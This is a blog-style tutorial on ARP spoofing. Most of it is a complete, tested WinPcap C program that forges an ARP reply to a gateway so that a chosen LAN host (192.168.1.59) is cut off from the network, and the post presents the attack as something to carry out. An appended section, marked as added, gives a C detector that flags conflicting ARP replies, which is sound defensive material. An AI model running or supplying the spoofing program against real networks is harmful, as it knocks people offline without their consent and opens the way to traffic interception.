ARP spoofing comes in two kinds: spoofing the PC that someone else is using, and spoofing the gateway. The first is very easy to discover: the other person only has to look at their machine's ARP cache, and if they have a firewall installed the spoof will not succeed at all. The second has a higher success rate and is more covert; it takes the network administrator checking the gateway's ARP table to find it, provided the gateway is not using static ARP.
Of course, if you use a packet capture tool it is also easy to analyze the cause of the problem; I personally prefer Wireshark.
Suppose the gateway is 192.168.1.1 and its real MAC is 00-10-e0-e7-cc-f0, and we want to stop 192.168.1.59 from getting online. We can spoof .59 by telling it a wrong MAC for the gateway, or spoof the gateway by telling it a wrong MAC for .59. The example below spoofs the gateway; spoofing .59 is similar.
The program below was written with WinPcap 4.02 and VS2003 and has been tested; all WinPcap documentation can be found at http://www.winpcap.org/.
// SendPacket.cpp : defines the entry point for the console application.
//
#include "stdafx.h"
#include <stdlib.h>
#include <stdio.h>
#include <pcap.h>
#include "remote-ext.h"

int main(int argc, char **argv)
{
    pcap_t *fp;
    char errbuf[PCAP_ERRBUF_SIZE];
    u_char packet[60];
    pcap_if_t *alldevs;
    pcap_if_t *d;
    int inum;
    int i = 0;

    /* Retrieve the device list on the local machine */
    if (pcap_findalldevs_ex(PCAP_SRC_IF_STRING, NULL, &alldevs, errbuf) == -1)
    {
        fprintf(stderr, "Error in pcap_findalldevs: %s\n", errbuf);
        exit(1);
    }

    /* Print the list */
    for (d = alldevs; d; d = d->next)
    {
        printf("%d. %s", ++i, d->name);
        if (d->description)
            printf(" (%s)\n", d->description);
        else
            printf(" (No description available)\n");
    }

    if (i == 0)
    {
        printf("\nNo interfaces found! Make sure WinPcap is installed.\n");
        return 1;
    }

    printf("Enter the interface number (1-%d):", i);
    scanf("%d", &inum);

    if (inum < 1 || inum > i)
    {
        printf("\nInterface number out of range.\n");
        /* Free the device list */
        pcap_freealldevs(alldevs);
        return 1;
    }

    /* Jump to the selected adapter */
    for (d = alldevs, i = 0; i < inum - 1; d = d->next, i++);

    /* Open the output device */
    if ((fp = pcap_open(d->name,                   // name of the device
                        60,                        // portion of the packet to capture (only the first 60 bytes)
                        PCAP_OPENFLAG_PROMISCUOUS, // promiscuous mode
                        1000,                      // read timeout
                        NULL,                      // authentication on the remote machine
                        errbuf                     // error buffer
                        )) == NULL)
    {
        fprintf(stderr, "\nUnable to open the adapter. %s is not supported by WinPcap\n", d->name);
        pcap_freealldevs(alldevs);
        return 1;
    }

    /* The device list is no longer needed once the adapter is open */
    pcap_freealldevs(alldevs);

    /* Ethernet header. Supposing to be on Ethernet, set the destination MAC:
       the gateway, 00-10-e0-e7-cc-f0 */
    packet[0] = 0x00;
    packet[1] = 0x10;
    packet[2] = 0xe0;
    packet[3] = 0xe7;
    packet[4] = 0xcc;
    packet[5] = 0xf0;
    // set source MAC (the forged address 02-02-02-02-02-02)
    packet[6] = 0x02;
    packet[7] = 0x02;
    packet[8] = 0x02;
    packet[9] = 0x02;
    packet[10] = 0x02;
    packet[11] = 0x02;
    // frame type (EtherType): 0x0806 = ARP
    packet[12] = 0x08;
    packet[13] = 0x06;

    /* ARP header */
    // hardware type: 1 = Ethernet
    packet[14] = 0x00;
    packet[15] = 0x01;
    // protocol type: 0x0800 = IPv4
    packet[16] = 0x08;
    packet[17] = 0x00;
    // hardware address length
    packet[18] = 0x06;
    // protocol address length
    packet[19] = 0x04;
    // op: 2 = ARP reply
    packet[20] = 0x00;
    packet[21] = 0x02;
    // sender MAC (the forged address the gateway will cache for .59)
    packet[22] = 0x02;
    packet[23] = 0x02;
    packet[24] = 0x02;
    packet[25] = 0x02;
    packet[26] = 0x02;
    packet[27] = 0x02;
    // sender IP: 192.168.1.59
    packet[28] = 0xc0;
    packet[29] = 0xa8;
    packet[30] = 0x01;
    packet[31] = 0x3B;
    // target MAC: the gateway
    packet[32] = 0x00;
    packet[33] = 0x10;
    packet[34] = 0xe0;
    packet[35] = 0xe7;
    packet[36] = 0xcc;
    packet[37] = 0xf0;
    // target IP: 192.168.1.1
    packet[38] = 0xc0;
    packet[39] = 0xa8;
    packet[40] = 0x01;
    packet[41] = 0x01;

    /* Fill the rest of the packet (padding up to the 60-byte minimum frame size) */
    for (i = 42; i < 60; i++)
    {
        packet[i] = i % 256;
    }

    /* Send down the packet */
    if (pcap_sendpacket(fp, packet, 60 /* size */) != 0)
    {
        fprintf(stderr, "\nError sending the packet: %s\n", pcap_geterr(fp));
        pcap_close(fp);
        return 1;
    }

    pcap_close(fp);
    return 0;
}
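The defender-side counterpart, added here as an example that is not part of the original post: it parses ARP replies laid out exactly like packet[] above and flags a reply whose sender IP is already bound to a different MAC, which is the symptom an administrator looks for in the gateway's ARP table or in a Wireshark capture. The genuine MAC 00-11-22-33-44-55 for 192.168.1.59 is an assumed placeholder; the gateway and forged MACs are the page's.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
/* Bytes 12..21 of an IPv4-over-Ethernet ARP reply: EtherType 0x0806, htype 1,
 * ptype 0x0800, hlen 6, plen 4, opcode 2 (the same values the page's packet[] carries). */
static const uint8_t ARP_REPLY_HDR[10] = {0x08,0x06, 0x00,0x01, 0x08,0x00, 0x06,0x04, 0x00,0x02};
/* Learned IP -> MAC bindings; seed trusted entries (e.g. from static ARP) before monitoring. */
static struct { uint32_t ip; uint8_t mac[6]; } table[32];
static int nbindings;
int arp_table_learn(uint32_t ip, const uint8_t mac[6])
{
    if (nbindings >= 32) return -1;
    table[nbindings].ip = ip;
    memcpy(table[nbindings++].mac, mac, 6);
    return 0;
}

/* Build a 42-byte ARP reply with the same field offsets as the page's packet[] (test input only). */
void build_arp_reply(uint8_t *f, const uint8_t smac[6], const uint8_t sip[4],
                     const uint8_t tmac[6], const uint8_t tip[4])
{
    memcpy(f, tmac, 6);      memcpy(f + 6, smac, 6);  memcpy(f + 12, ARP_REPLY_HDR, 10);
    memcpy(f + 22, smac, 6); memcpy(f + 28, sip, 4);  memcpy(f + 32, tmac, 6); memcpy(f + 38, tip, 4);
}
/* 1 if the frame is an ARP reply whose sender IP is already bound to a different MAC, or whose
 * Ethernet source differs from its ARP sender MAC; 0 otherwise (unknown senders are learned). */
int arp_reply_conflicts(const uint8_t *f, size_t len)
{
    if (len < 42 || memcmp(f + 12, ARP_REPLY_HDR, 10) != 0) return 0;   /* not an ARP reply */
    const uint8_t *smac = f + 22;
    uint32_t sip = ((uint32_t)f[28] << 24) | ((uint32_t)f[29] << 16) | ((uint32_t)f[30] << 8) | f[31];
    if (memcmp(f + 6, smac, 6) != 0) return 1;
    for (int i = 0; i < nbindings; i++)
        if (table[i].ip == sip) return memcmp(table[i].mac, smac, 6) != 0;
    arp_table_learn(sip, smac);
    return 0;
}
int main(void)
{   /* Constructed: the page's gateway and spoofed MACs, plus an assumed genuine MAC for .59 */
    const uint8_t gw_mac[6] = {0x00,0x10,0xe0,0xe7,0xcc,0xf0}, gw_ip[4] = {192,168,1,1};
    const uint8_t h59_mac[6] = {0x00,0x11,0x22,0x33,0x44,0x55}, h59_ip[4] = {192,168,1,59};
    const uint8_t fake_mac[6] = {0x02,0x02,0x02,0x02,0x02,0x02}; uint8_t frame[42];
    arp_table_learn(0xC0A8013Bu, h59_mac);                   /* trusted binding for 192.168.1.59 */
    build_arp_reply(frame, h59_mac, h59_ip, gw_mac, gw_ip);
    printf("genuine reply: conflict=%d\n", arp_reply_conflicts(frame, sizeof frame));  /* 0 */
    build_arp_reply(frame, fake_mac, h59_ip, gw_mac, gw_ip);  /* the reply the page's program sends */
    printf("spoofed reply: conflict=%d\n", arp_reply_conflicts(frame, sizeof frame));  /* 1 */
    return 0;
}
```

To run this against live traffic, feed each frame returned by pcap_next_ex() to arp_reply_conflicts(); the 60-byte padded frame the program above sends passes the length check unchanged.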